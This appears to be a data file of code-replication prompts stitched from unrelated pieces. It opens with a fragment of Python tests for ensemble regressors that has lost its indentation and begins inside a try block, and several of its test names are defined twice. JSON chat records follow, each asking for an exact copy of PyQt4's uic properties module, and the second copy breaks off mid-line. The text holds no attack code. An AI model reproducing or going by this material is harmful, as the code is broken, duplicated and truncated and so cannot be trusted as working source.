from sklearn.preprocessing import StandardScaler, PolynomialFeatures
from sklearn.datasets import load_boston
has_sklearn = True
except ImportError:
has_sklearn = False
if has_sklearn:
X, y = load_boston(True)
estimators = [Lasso(),
GradientBoostingRegressor(),
LinearRegression(),
KNeighborsRegressor(),
SVR(gamma='scale'),
RandomForestRegressor(n_estimators=100),
]
est_prep = {'prep1': estimators,
'prep2': estimators,
'prep3': estimators}
prep_1 = [PCA()]
prep_2 = [PolynomialFeatures(), StandardScaler()]
prep = {'prep1': prep_1,
'prep2': prep_2,
'prep3': []}
def get_ensemble(cls, backend, preprocessing, **kwargs):
"""Get ensemble."""
if preprocessing:
est = est_prep
else:
est = estimators
ens = cls(backend=backend, **kwargs)
ens.add(est, preprocessing)
ens.add(LinearRegression(), meta=True)
return ens
def test_super_learner_s_m():
"""[SuperLearner] Test scikit-learn comp - mp | np"""
ens = get_ensemble(SuperLearner, 'multiprocessing', None)
ens.fit(X, y)
p = ens.predict(X)
assert p.shape == y.shape
assert p.dtype == ens.layer_1.dtype
ens = return_pickled(ens)
pp = ens.predict(X)
np.testing.assert_array_equal(p, pp)
def test_super_learner_f_m():
"""[SuperLearner] Test scikit-learn comp - mp | p"""
ens = get_ensemble(SuperLearner, 'multiprocessing', prep)
ens.fit(X, y)
p = ens.predict(X)
assert p.shape == y.shape
assert p.dtype == ens.layer_1.dtype
ens = return_pickled(ens)
pp = ens.predict(X)
np.testing.assert_array_equal(p, pp)
def test_super_learner_s_t():
"""[SuperLearner] Test scikit-learn comp - th | np"""
ens = get_ensemble(SuperLearner, 'threading', None)
ens.fit(X, y)
p = ens.predict(X)
assert p.shape == y.shape
assert p.dtype == ens.layer_1.dtype
ens = return_pickled(ens)
pp = ens.predict(X)
np.testing.assert_array_equal(p, pp)
def test_super_learner_f_t():
"""[SuperLearner] Test scikit-learn comp - th | p"""
ens = get_ensemble(SuperLearner, 'threading', prep)
ens.fit(X, y)
p = ens.predict(X)
assert p.shape == y.shape
assert p.dtype == ens.layer_1.dtype
ens = return_pickled(ens)
pp = ens.predict(X)
np.testing.assert_array_equal(p, pp)
def test_subsemble_s_m():
"""[Subsemble] Test scikit-learn comp - mp | np"""
ens = get_ensemble(Subsemble, 'multiprocessing', None)
ens.fit(X, y)
p = ens.predict(X)
assert p.shape == y.shape
assert p.dtype == ens.layer_1.dtype
ens = return_pickled(ens)
pp = ens.predict(X)
np.testing.assert_array_equal(p, pp)
def test_subsemble_f_m():
"""[Subsemble] Test scikit-learn comp - mp | p"""
ens = get_ensemble(Subsemble, 'multiprocessing', prep)
ens.fit(X, y)
p = ens.predict(X)
assert p.shape == y.shape
assert p.dtype == ens.layer_1.dtype
ens = return_pickled(ens)
pp = ens.predict(X)
np.testing.assert_array_equal(p, pp)
def test_subsemble_s_t():
"""[Subsemble] Test scikit-learn comp - th | np"""
ens = get_ensemble(Subsemble, 'threading', None)
ens.fit(X, y)
p = ens.predict(X)
assert p.shape == y.shape
assert p.dtype == ens.layer_1.dtype
ens = return_pickled(ens)
pp = ens.predict(X)
np.testing.assert_array_equal(p, pp)
def test_subsemble_f_t():
"""[Subsemble] Test scikit-learn comp - th | p"""
ens = get_ensemble(Subsemble, 'threading', prep)
ens.fit(X, y)
p = ens.predict(X)
assert p.shape == y.shape
assert p.dtype == ens.layer_1.dtype
ens = return_pickled(ens)
pp = ens.predict(X)
np.testing.assert_array_equal(p, pp)
def test_blend_s_m():
"""[BlendEnsemble] Test scikit-learn comp - mp | np"""
ens = get_ensemble(BlendEnsemble, 'multiprocessing', None)
ens.fit(X, y)
p = ens.predict(X)
assert p.shape == y.shape
assert p.dtype == ens.layer_1.dtype
ens = return_pickled(ens)
pp = ens.predict(X)
np.testing.assert_array_equal(p, pp)
def test_blend_f_m():
"""[BlendEnsemble] Test scikit-learn comp - mp | p"""
ens = get_ensemble(BlendEnsemble, 'multiprocessing', prep)
ens.fit(X, y)
p = ens.predict(X)
assert p.shape == y.shape
assert p.dtype == ens.layer_1.dtype
ens = return_pickled(ens)
pp = ens.predict(X)
np.testing.assert_array_equal(p, pp)
def test_blend_s_m():
"""[BlendEnsemble] Test scikit-learn comp - th | np"""
ens = get_ensemble(BlendEnsemble, 'threading', None)
ens.fit(X, y)
p = ens.predict(X)
assert p.shape == y.shape
assert p.dtype == ens.layer_1.dtype
ens = return_pickled(ens)
pp = ens.predict(X)
np.testing.assert_array_equal(p, pp)
def test_blend_f_m():
"""[BlendEnsemble] Test scikit-learn comp - th | p"""
ens = get_ensemble(BlendEnsemble, 'threading', prep)
ens.fit(X, y)
p = ens.predict(X)
assert p.shape == y.shape
assert p.dtype == ens.layer_1.dtype
ens = return_pickled(ens)
pp = ens.predict(X)
np.testing.assert_array_equal(p, pp)
def test_temporal_s_m():
"""[TemporalEnsemble] Test scikit-learn comp - mp | np"""
ens = get_ensemble(TemporalEnsemble, 'multiprocessing', None, step_size=10)
ens.fit(X, y)
p = ens.predict(X)
assert p.shape == y.shape
assert p.dtype == ens.layer_1.dtype
ens = return_pickled(ens)
pp = ens.predict(X)
np.testing.assert_array_equal(p, pp)
def test_temporal_f_m():
"""[TemporalEnsemble] Test scikit-learn comp - mp | p"""
ens = get_ensemble(TemporalEnsemble, 'multiprocessing', prep, step_size=10)
ens.fit(X, y)
p = ens.predict(X)
assert p.shape == y.shape
assert p.dtype == ens.layer_1.dtype
ens = return_pickled(ens)
pp = ens.predict(X)
np.testing.assert_array_equal(p, pp)
def test_temporal_s_m():
"""[TemporalEnsemble] Test scikit-learn comp - th | np"""
ens = get_ensemble(TemporalEnsemble, 'threading', None, step_size=10)
ens.fit(X, y)
p = ens.predict(X)
assert p.shape == y.shape
assert p.dtype == ens.layer_1.dtype
ens = return_pickled(ens)
pp = ens.predict(X)
np.testing.assert_array_equal(p, pp)
def test_temporal_f_m():
"""[TemporalEnsemble] Test scikit-learn comp - th | p"""
ens = get_ensemble(TemporalEnsemble, 'threading', prep, step_size=10)
ens.fit(X, y)
p = ens.predict(X)
assert p.shape == y.shape
assert p.dtype == ens.layer_1.dtype
ens = return_pickled(ens)
pp = ens.predict(X)
np.testing.assert_array_equal(p, pp)
```
|
[
{
"content": "Replicate the code snippet exactly, without paraphrasing or reformatting:\n```python\n#############################################################################\n##\n## Copyright (C) 2015 Riverbank Computing Limited.\n## Copyright (C) 2006 Thorsten Marek.\n## All right reserved.\n##\n## This file is part of PyQt.\n##\n## You may use this file under the terms of the GPL v2 or the revised BSD\n## license as follows:\n##\n## \"Redistribution and use in source and binary forms, with or without\n## modification, are permitted provided that the following conditions are\n## met:\n## * Redistributions of source code must retain the above copyright\n## notice, this list of conditions and the following disclaimer.\n## * Redistributions in binary form must reproduce the above copyright\n## notice, this list of conditions and the following disclaimer in\n## the documentation and/or other materials provided with the\n## distribution.\n## * Neither the name of the Riverbank Computing Limited nor the names\n## of its contributors may be used to endorse or promote products\n## derived from this software without specific prior written\n## permission.\n##\n## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n## \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\"\n##\n#############################################################################\n\n\nimport logging\nimport os.path\nimport sys\n\nfrom PyQt4.uic.exceptions import UnsupportedPropertyError\nfrom PyQt4.uic.icon_cache import IconCache\n\nif sys.hexversion >= 0x03000000:\n from PyQt4.uic.port_v3.ascii_upper import ascii_upper\nelse:\n from PyQt4.uic.port_v2.ascii_upper import ascii_upper\n\n\nlogger = logging.getLogger(__name__)\nDEBUG = logger.debug\n\nQtCore = None\nQtGui = None\n\n\ndef int_list(prop):\n return [int(child.text) for child in prop]\n\ndef float_list(prop):\n return [float(child.text) for child in prop]\n\nbool_ = lambda v: v == \"true\"\n\ndef qfont_enum(v):\n return getattr(QtGui.QFont, v)\n\ndef needsWidget(func):\n func.needsWidget = True\n return func\n\n\nclass Properties(object):\n def __init__(self, factory, QtCore_mod, QtGui_mod):\n global QtGui, QtCore\n QtGui = QtGui_mod\n QtCore = QtCore_mod\n self.factory = factory\n\n self._base_dir = ''\n\n self.reset()\n\n def set_base_dir(self, base_dir):\n \"\"\" Set the base directory to be used for all relative filenames. \"\"\"\n\n self._base_dir = base_dir\n self.icon_cache.set_base_dir(base_dir)\n\n def reset(self):\n self.buddies = []\n self.delayed_props = []\n self.icon_cache = IconCache(self.factory, QtGui)\n\n def _pyEnumMember(self, cpp_name):\n try:\n prefix, membername = cpp_name.split(\"::\")\n except ValueError:\n prefix = \"Qt\"\n membername = cpp_name\n\n if prefix == \"Qt\":\n return getattr(QtCore.Qt, membername)\n\n scope = self.factory.findQObjectType(prefix)\n if scope is None:\n raise AttributeError(\"unknown enum %s\" % cpp_name)\n\n return getattr(scope, membername)\n\n def _set(self, prop):\n expr = [self._pyEnumMember(v) for v in prop.text.split('|')]\n\n value = expr[0]\n for v in expr[1:]:\n value |= v\n\n return value\n\n def _enum(self, prop):\n return self._pyEnumMember(prop.text)\n\n def _number(self, prop):\n return int(prop.text)\n\n _uInt = _longLong = _uLongLong = _number\n\n def _double(self, prop):\n return float(prop.text)\n\n def _bool(self, prop):\n return prop.text == 'true'\n\n def _stringlist(self, prop):\n return [self._string(p, notr='true') for p in prop]\n\n def _string(self, prop, notr=None):\n text = prop.text\n\n if text is None:\n return \"\"\n\n if prop.get('notr', notr) == 'true':\n return text\n\n disambig = prop.get('comment')\n\n # Allow for Qt5 without deprecated features.\n try:\n encoding = QtGui.QApplication.UnicodeUTF8\n translated = QtGui.QApplication.translate(self.uiname, text,\n disambig, encoding)\n except AttributeError:\n translated = QtGui.QApplication.translate(self.uiname, text,\n disambig)\n\n return translated\n\n _char = _string\n\n def _cstring(self, prop):\n return str(prop.text)\n\n def _color(self, prop):\n args = int_list(prop)\n\n # Handle the optional alpha component.\n alpha = int(prop.get(\"alpha\", \"255\"))\n\n if alpha != 255:\n args.append(alpha)\n\n return QtGui.QColor(*args)\n\n def _point(self, prop):\n return QtCore.QPoint(*int_list(prop))\n\n def _pointf(self, prop):\n return QtCore.QPointF(*float_list(prop))\n\n def _rect(self, prop):\n return QtCore.QRect(*int_list(prop))\n\n def _rectf(self, prop):\n return QtCore.QRectF(*float_list(prop))\n\n def _size(self, prop):\n return QtCore.QSize(*int_list(prop))\n\n def _sizef(self, prop):\n return QtCore.QSizeF(*float_list(prop))\n\n def _pixmap(self, prop):\n if prop.text:\n fname = prop.text.replace(\"\\\\\", \"\\\\\\\\\")\n if self._base_dir != '' and fname[0] != ':' and not os.path.isabs(fname):\n fname = os.path.join(self._base_dir, fname)\n\n return QtGui.QPixmap(fname)\n\n # Don't bother to set the property if the pixmap is empty.\n return None\n\n def _iconset(self, prop):\n return self.icon_cache.get_icon(prop)\n\n def _url(self, prop):\n return QtCore.QUrl(prop[0].text)\n\n def _locale(self, prop):\n lang = getattr(QtCore.QLocale, prop.attrib['language'])\n country = getattr(QtCore.QLocale, prop.attrib['country'])\n return QtCore.QLocale(lang, country)\n\n def _date(self, prop):\n return QtCore.QDate(*int_list(prop))\n\n def _datetime(self, prop):\n args = int_list(prop)\n return QtCore.QDateTime(QtCore.QDate(*args[-3:]), QtCore.QTime(*args[:-3]))\n\n def _time(self, prop):\n return QtCore.QTime(*int_list(prop))\n\n def _gradient(self, prop):\n name = 'gradient'\n\n # Create the specific gradient.\n gtype = prop.get('type', '')\n\n if gtype == 'LinearGradient':\n startx = float(prop.get('startx'))\n starty = float(prop.get('starty'))\n endx = float(prop.get('endx'))\n endy = float(prop.get('endy'))\n gradient = self.factory.createQObject('QLinearGradient', name,\n (startx, starty, endx, endy), is_attribute=False)\n\n elif gtype == 'ConicalGradient':\n centralx = float(prop.get('centralx'))\n centraly = float(prop.get('centraly'))\n angle = float(prop.get('angle'))\n gradient = self.factory.createQObject('QConicalGradient', name,\n (centralx, centraly, angle), is_attribute=False)\n\n elif gtype == 'RadialGradient':\n centralx = float(prop.get('centralx'))\n centraly = float(prop.get('centraly'))\n radius = float(prop.get('radius'))\n focalx = float(prop.get('focalx'))\n focaly = float(prop.get('focaly'))\n gradient = self.factory.createQObject('QRadialGradient', name,\n (centralx, centraly, radius, focalx, focaly),\n is_attribute=False)\n\n else:\n raise UnsupportedPropertyError(prop.tag)\n\n # Set the common values.\n spread = prop.get('spread')\n if spread:\n gradient.setSpread(getattr(QtGui.QGradient, spread))\n\n cmode = prop.get('coordinatemode')\n if cmode:\n gradient.setCoordinateMode(getattr(QtGui.QGradient, cmode))\n\n # Get the gradient stops.\n for gstop in prop:\n if gstop.tag != 'gradientstop':\n raise UnsupportedPropertyError(gstop.tag)\n\n position = float(gstop.get('position'))\n color = self._color(gstop[0])\n\n gradient.setColorAt(position, color)\n\n return name\n\n def _palette(self, prop):\n palette = self.factory.createQObject(\"QPalette\", \"palette\", (),\n is_attribute=False)\n\n for palette_elem in prop:\n sub_palette = getattr(QtGui.QPalette, palette_elem.tag.title())\n for role, color in enumerate(palette_elem):\n if color.tag == 'color':\n # Handle simple colour descriptions where the role is\n # implied by the colour's position.\n palette.setColor(sub_palette,\n QtGui.QPalette.ColorRole(role), self._color(color))\n elif color.tag == 'colorrole':\n role = getattr(QtGui.QPalette, color.get('role'))\n brush = self._brush(color[0])\n palette.setBrush(sub_palette, role, brush)\n else:\n raise UnsupportedPropertyError(color.tag)\n\n return palette\n\n def _brush(self, prop):\n brushstyle = prop.get('brushstyle')\n\n if brushstyle in ('LinearGradientPattern', 'ConicalGradientPattern', 'RadialGradientPattern'):\n gradient = self._gradient(prop[0])\n brush = self.factory.createQObject(\"QBrush\", \"brush\", (gradient, ),\n is_attribute=False)\n else:\n color = self._color(prop[0])\n brush = self.factory.createQObject(\"QBrush\", \"brush\", (color, ),\n is_attribute=False)\n\n brushstyle = getattr(QtCore.Qt, brushstyle)\n brush.setStyle(brushstyle)\n\n return brush\n\n #@needsWidget\n def _sizepolicy(self, prop, widget):\n values = [int(child.text) for child in prop]\n\n if len(values) == 2:\n # Qt v4.3.0 and later.\n horstretch, verstretch = values\n hsizetype = getattr(QtGui.QSizePolicy, prop.get('hsizetype'))\n vsizetype = getattr(QtGui.QSizePolicy, prop.get('vsizetype'))\n else:\n hsizetype, vsizetype, horstretch, verstretch = values\n hsizetype = QtGui.QSizePolicy.Policy(hsizetype)\n vsizetype = QtGui.QSizePolicy.Policy(vsizetype)\n\n sizePolicy = self.factory.createQObject(\"QSizePolicy\", \"sizePolicy\",\n (hsizetype, vsizetype), is_attribute=False)\n sizePolicy.setHorizontalStretch(horstretch)\n sizePolicy.setVerticalStretch(verstretch)\n sizePolicy.setHeightForWidth(widget.sizePolicy().hasHeightForWidth())\n return sizePolicy\n _sizepolicy = needsWidget(_sizepolicy)\n\n # font needs special handling/conversion of all child elements.\n _font_attributes = ((\"Family\", str),\n (\"PointSize\", int),\n (\"Bold\", bool_),\n (\"Italic\", bool_),\n (\"Underline\", bool_),\n (\"Weight\", int),\n (\"StrikeOut\", bool_),\n (\"Kerning\", bool_),\n (\"StyleStrategy\", qfont_enum))\n\n def _font(self, prop):\n newfont = self.factory.createQObject(\"QFont\", \"font\", (),\n is_attribute = False)\n for attr, converter in self._font_attributes:\n v = prop.findtext(\"./%s\" % (attr.lower(),))\n if v is None:\n continue\n\n getattr(newfont, \"set%s\" % (attr,))(converter(v))\n return newfont\n\n def _cursor(self, prop):\n return QtGui.QCursor(QtCore.Qt.CursorShape(int(prop.text)))\n\n def _cursorShape(self, prop):\n return QtGui.QCursor(getattr(QtCore.Qt, prop.text))\n\n def convert(self, prop, widget=None):\n try:\n func = getattr(self, \"_\" + prop[0].tag)\n except AttributeError:\n raise UnsupportedPropertyError(prop[0].tag)\n else:\n args = {}\n if getattr(func, \"needsWidget\", False):\n assert widget is not None\n args[\"widget\"] = widget\n\n return func(prop[0], **args)\n\n\n def _getChild(self, elem_tag, elem, name, default=None):\n for prop in elem.findall(elem_tag):\n if prop.attrib[\"name\"] == name:\n return self.convert(prop)\n else:\n return default\n\n def getProperty(self, elem, name, default=None):\n return self._getChild(\"property\", elem, name, default)\n\n def getAttribute(self, elem, name, default=None):\n return self._getChild(\"attribute\", elem, name, default)\n\n def setProperties(self, widget, elem):\n # Lines are sunken unless the frame shadow is explicitly set.\n set_sunken = (elem.attrib.get('class') == 'Line')\n\n for prop in elem.findall('property'):\n prop_name = prop.attrib['name']\n DEBUG(\"setting property %s\" % (prop_name,))\n\n if prop_name == 'frameShadow':\n set_sunken = False\n\n try:\n stdset = bool(int(prop.attrib['stdset']))\n except KeyError:\n stdset = True\n\n if not stdset:\n self._setViaSetProperty(widget, prop)\n elif hasattr(self, prop_name):\n getattr(self, prop_name)(widget, prop)\n else:\n prop_value = self.convert(prop, widget)\n if prop_value is not None:\n getattr(widget, 'set%s%s' % (ascii_upper(prop_name[0]), prop_name[1:]))(prop_value)\n\n if set_sunken:\n widget.setFrameShadow(QtGui.QFrame.Sunken)\n\n # SPECIAL PROPERTIES\n # If a property has a well-known value type but needs special,\n # context-dependent handling, the default behaviour can be overridden here.\n\n # Delayed properties will be set after the whole widget tree has been\n # populated.\n def _delayed_property(self, widget, prop):\n prop_value = self.convert(prop)\n if prop_value is not None:\n prop_name = prop.attrib[\"name\"]\n self.delayed_props.append((widget, False,\n 'set%s%s' % (ascii_upper(prop_name[0]), prop_name[1:]),\n prop_value))\n\n # These properties will be set with a widget.setProperty call rather than\n # calling the set<property> function.\n def _setViaSetProperty(self, widget, prop):\n prop_value = self.convert(prop)\n if prop_value is not None:\n prop_name = prop.attrib['name']\n\n # This appears to be a Designer/uic hack where stdset=0 means that\n # the viewport should be used.\n if prop[0].tag == 'cursorShape':\n widget.viewport().setProperty(prop_name, prop_value)\n else:\n widget.setProperty(prop_name, prop_value)\n\n # Ignore the property.\n def _ignore(self, widget, prop):\n pass\n\n # Define properties that use the canned handlers.\n currentIndex = _delayed_property\n currentRow = _delayed_property\n\n showDropIndicator = _setViaSetProperty\n intValue = _setViaSetProperty\n value = _setViaSetProperty\n\n objectName = _ignore\n margin = _ignore\n leftMargin = _ignore\n topMargin = _ignore\n rightMargin = _ignore\n bottomMargin = _ignore\n spacing = _ignore\n horizontalSpacing = _ignore\n verticalSpacing = _ignore\n\n # tabSpacing is actually the spacing property of the widget's layout.\n def tabSpacing(self, widget, prop):\n prop_value = self.convert(prop)\n if prop_value is not None:\n self.delayed_props.append((widget, True, 'setSpacing', prop_value))\n\n # buddy setting has to be done after the whole widget tree has been\n # populated. We can't use delay here because we cannot get the actual\n # buddy yet.\n def buddy(self, widget, prop):\n buddy_name = prop[0].text\n if buddy_name:\n self.buddies.append((widget, buddy_name))\n\n # geometry is handled specially if set on the toplevel widget.\n def geometry(self, widget, prop):\n if widget.objectName() == self.uiname:\n geom = int_list(prop[0])\n widget.resize(geom[2], geom[3])\n else:\n widget.setGeometry(self._rect(prop[0]))\n\n def orientation(self, widget, prop):\n # If the class is a QFrame, it's a line.\n if widget.metaObject().className() == \"QFrame\":\n widget.setFrameShape(\n {\"Qt::Horizontal\": QtGui.QFrame.HLine,\n \"Qt::Vertical\" : QtGui.QFrame.VLine}[prop[0].text])\n else:\n widget.setOrientation(self._enum(prop[0]))\n\n # The isWrapping attribute of QListView is named inconsistently, it should\n # be wrapping.\n def isWrapping(self, widget, prop):\n widget.setWrapping(self.convert(prop))\n\n # This is a pseudo-property injected to deal with margins.\n def pyuicMargins(self, widget, prop):\n left, top, right, bottom = int_list(prop)\n\n if left == top and left == right and left == bottom:\n widget.setMargin(left)\n else:\n widget.setContentsMargins(left, top, right, bottom)\n\n # This is a pseudo-property injected to deal with spacing.\n def pyuicSpacing(self, widget, prop):\n horiz, vert = int_list(prop)\n\n if horiz == vert:\n widget.setSpacing(horiz)\n else:\n if horiz >= 0:\n widget.setHorizontalSpacing(horiz)\n\n if vert >= 0:\n widget.setVerticalSpacing(vert)\n```",
"role": "user"
}
] |
[
{
"content": "Replicate the code snippet exactly, without paraphrasing or reformatting:\n<|memory_start|>```python\n#############################################################################\n##\n## Copyright (C) 2015 Riverbank Computing Limited.\n## Copyright (C) 2006 Thorsten Marek.\n## All right reserved.\n##\n## This file is part of PyQt.\n##\n## You may use this file under the terms of the GPL v2 or the revised BSD\n## license as follows:\n##\n## \"Redistribution and use in source and binary forms, with or without\n## modification, are permitted provided that the following conditions are\n## met:\n## * Redistributions of source code must retain the above copyright\n## notice, this list of conditions and the following disclaimer.\n## * Redistributions in binary form must reproduce the above copyright\n## notice, this list of conditions and the following disclaimer in\n## the documentation and/or other materials provided with the\n## distribution.\n## * Neither the name of the Riverbank Computing Limited nor the names\n## of its contributors may be used to endorse or promote products\n## derived from this software without specific prior written\n## permission.\n##\n## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n## \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\"\n##\n#############################################################################\n\n\nimport logging\nimport os.path\nimport sys\n\nfrom PyQt4.uic.exceptions import UnsupportedPropertyError\nfrom PyQt4.uic.icon_cache import IconCache\n\nif sys.hexversion >= 0x03000000:\n from PyQt4.uic.port_v3.ascii_upper import ascii_upper\nelse:\n from PyQt4.uic.port_v2.ascii_upper import ascii_upper\n\n\nlogger = logging.getLogger(__name__)\nDEBUG = logger.debug\n\nQtCore = None\nQtGui = None\n\n\ndef int_list(prop):\n return [int(child.text) for child in prop]\n\ndef float_list(prop):\n return [float(child.text) for child in prop]\n\nbool_ = lambda v: v == \"true\"\n\ndef qfont_enum(v):\n return getattr(QtGui.QFont, v)\n\ndef needsWidget(func):\n func.needsWidget = True\n return func\n\n\nclass Properties(object):\n def __init__(self, factory, QtCore_mod, QtGui_mod):\n global QtGui, QtCore\n QtGui = QtGui_mod\n QtCore = QtCore_mod\n self.factory = factory\n\n self._base_dir = ''\n\n self.reset()\n\n def set_base_dir(self, base_dir):\n \"\"\" Set the base directory to be used for all relative filenames. \"\"\"\n\n self._base_dir = base_dir\n self.icon_cache.set_base_dir(base_dir)\n\n def reset(self):\n self.buddies = []\n self.delayed_props = []\n self.icon_cache = IconCache(self.factory, QtGui)\n\n def _pyEnumMember(self, cpp_name):\n try:\n prefix, membername = cpp_name.split(\"::\")\n except ValueError:\n prefix = \"Qt\"\n membername = cpp_name\n\n if prefix == \"Qt\":\n return getattr(QtCore.Qt, membername)\n\n scope = self.factory.findQObjectType(prefix)\n if scope is None:\n raise AttributeError(\"unknown enum %s\" % cpp_name)\n\n return getattr(scope, membername)\n\n def _set(self, prop):\n expr = [self._pyEnumMember(v) for v in prop.text.split('|')]\n\n value = expr[0]\n for v in expr[1:]:\n value |= v\n\n return value\n\n def _enum(self, prop):\n return self._pyEnumMember(prop.text)\n\n def _number(self, prop):\n return int(prop.text)\n\n _uInt = _longLong = _uLongLong = _number\n\n def _double(self, prop):\n return float(prop.text)\n\n def _bool(self, prop):\n return prop.text == 'true'\n\n def _stringlist(self, prop):\n return [self._string(p, notr='true') for p in prop]\n\n def _string(self, prop, notr=None):\n text = prop.text\n\n if text is None:\n return \"\"\n\n if prop.get('notr', notr) == 'true':\n return text\n\n disambig = prop.get('comment')\n\n # Allow for Qt5 without deprecated features.\n try:\n encoding = QtGui.QApplication.UnicodeUTF8\n translated = QtGui.QApplication.translate(self.uiname, text,\n disambig, encoding)\n except AttributeError:\n translated = QtGui.QApplication.translate(self.uiname, text,\n disambig)\n\n return translated\n\n _char = _string\n\n def _cstring(self, prop):\n return str(prop.text)\n\n def _color(self, prop):\n args = int_list(prop)\n\n # Handle the optional alpha component.\n alpha = int(prop.get(\"alpha\", \"255\"))\n\n if alpha != 255:\n args.append(alpha)\n\n return QtGui.QColor(*args)\n\n def _point(self, prop):\n return QtCore.QPoint(*int_list(prop))\n\n def _pointf(self, prop):\n return QtCore.QPointF(*float_list(prop))\n\n def _rect(self, prop):\n return QtCore.QRect(*int_list(prop))\n\n def _rectf(self, prop):\n return QtCore.QRectF(*float_list(prop))\n\n def _size(self, prop):\n return QtCore.QSize(*int_list(prop))\n\n def _sizef(self, prop):\n return QtCore.QSizeF(*float_list(prop))\n\n def _pixmap(self, prop):\n if prop.text:\n fname = prop.text.replace(\"\\\\\", \"\\\\\\\\\")\n if self._base_dir != '' and fname[0] != ':' and not os.path.isabs(fname):\n fname = os.path.join(self._base_dir, fname)\n\n return QtGui.QPixmap(fname)\n\n # Don't bother to set the property if the pixmap is empty.\n return None\n\n def _iconset(self, prop):\n return self.icon_cache.get_icon(prop)\n\n def _url(self, prop):\n return QtCore.QUrl(prop[0].text)\n\n def _locale(self, prop):\n lang = getattr(QtCore.QLocale, prop.attrib['language'])\n country = getattr(QtCore.QLocale, prop.attrib['country'])\n return QtCore.QLocale(lang, country)\n\n def _date(self, prop):\n return QtCore.QDate(*int_list(prop))\n\n def _datetime(self, prop):\n args = int_list(prop)\n return QtCore.QDateTime(QtCore.QDate(*args[-3:]), QtCore.QTime(*args[:-3]))\n\n def _time(self, prop):\n return QtCore.QTime(*int_list(prop))\n\n def _gradient(self, prop):\n name = 'gradient'\n\n # Create the specific gradient.\n gtype = prop.get('type', '')\n\n if gtype == 'LinearGradient':\n startx = float(prop.get('startx'))\n starty = float(prop.get('starty'))\n endx = float(prop.get('endx'))\n endy = float(prop.get('endy'))\n gradient = self.factory.createQObject('QLinearGradient', name,\n (startx, starty, endx, endy), is_attribute=False)\n\n elif gtype == 'ConicalGradient':\n centralx = float(prop.get('centralx'))\n centraly = float(prop.get('centraly'))\n angle = float(prop.get('angle'))\n gradient = self.factory.createQObject('QConicalGradient', name,\n (centralx, centraly, angle), is_attribute=False)\n\n elif gtype == 'RadialGradient':\n centralx = float(prop.get('centralx'))\n centraly = float(prop.get('centraly'))\n radius = float(prop.get('radius'))\n focalx = float(prop.get('focalx'))\n focaly = float(prop.get('focaly'))\n gradient = self.factory.createQObject('QRadialGradient', name,\n (centralx, centraly, radius, focalx, focaly),\n is_attribute=False)\n\n else:\n raise UnsupportedPropertyError(prop.tag)\n\n # Set the common values.\n spread = prop.get('spread')\n if spread:\n gradient.setSpread(getattr(QtGui.QGradient, spread))\n\n cmode = prop.get('coordinatemode')\n if cmode:\n gradient.setCoordinateMode(getattr(QtGui.QGradient, cmode))\n\n # Get the gradient stops.\n for gstop in prop:\n if gstop.tag != 'gradientstop':\n raise UnsupportedPropertyError(gstop.tag)\n\n position = float(gstop.get('position'))\n color = self._color(gstop[0])\n\n gradient.setColorAt(position, color)\n\n return name\n\n def _palette(self, prop):\n palette = self.factory.createQObject(\"QPalette\", \"palette\", (),\n is_attribute=False)\n\n for palette_elem in prop:\n sub_palette = getattr(QtGui.QPalette, palette_elem.tag.title())\n for role, color in enumerate(palette_elem):\n if color.tag == 'color':\n # Handle simple colour descriptions where the role is\n # implied by the colour's position.\n palette.setColor(sub_palette,\n QtGui.QPalette.ColorRole(role), self._color(color))\n elif color.tag == 'colorrole':\n role = getattr(QtGui.QPalette, color.get('role'))\n brush = self._brush(color[0])\n palette.setBrush(sub_palette, role, brush)\n else:\n raise UnsupportedPropertyError(color.tag)\n\n return palette\n\n def _brush(self, prop):\n brushstyle = prop.get('brushstyle')\n\n if brushstyle in ('LinearGradientPattern', 'ConicalGradientPattern', 'RadialGradientPattern'):\n gradient = self._gradient(prop[0])\n brush = self.factory.createQObject(\"QBrush\", \"brush\", (gradient, ),\n is_attribute=False)\n else:\n color = self._color(prop[0])\n brush = self.factory.createQObject(\"QBrush\", \"brush\", (color, ),\n is_attribute=False)\n\n brushstyle = getattr(QtCore.Qt, brushstyle)\n brush.setStyle(brushstyle)\n\n return brush\n\n #@needsWidget\n def _sizepolicy(self, prop, widget):\n values = [int(child.text) for child in prop]\n\n if len(values) == 2:\n # Qt v4.3.0 and later.\n horstretch, verstretch = values\n hsizetype = getattr(QtGui.QSizePolicy, prop.get('hsizetype'))\n vsizetype = getattr(QtGui.QSizePolicy, prop.get('vsizetype'))\n else:\n hsizetype, 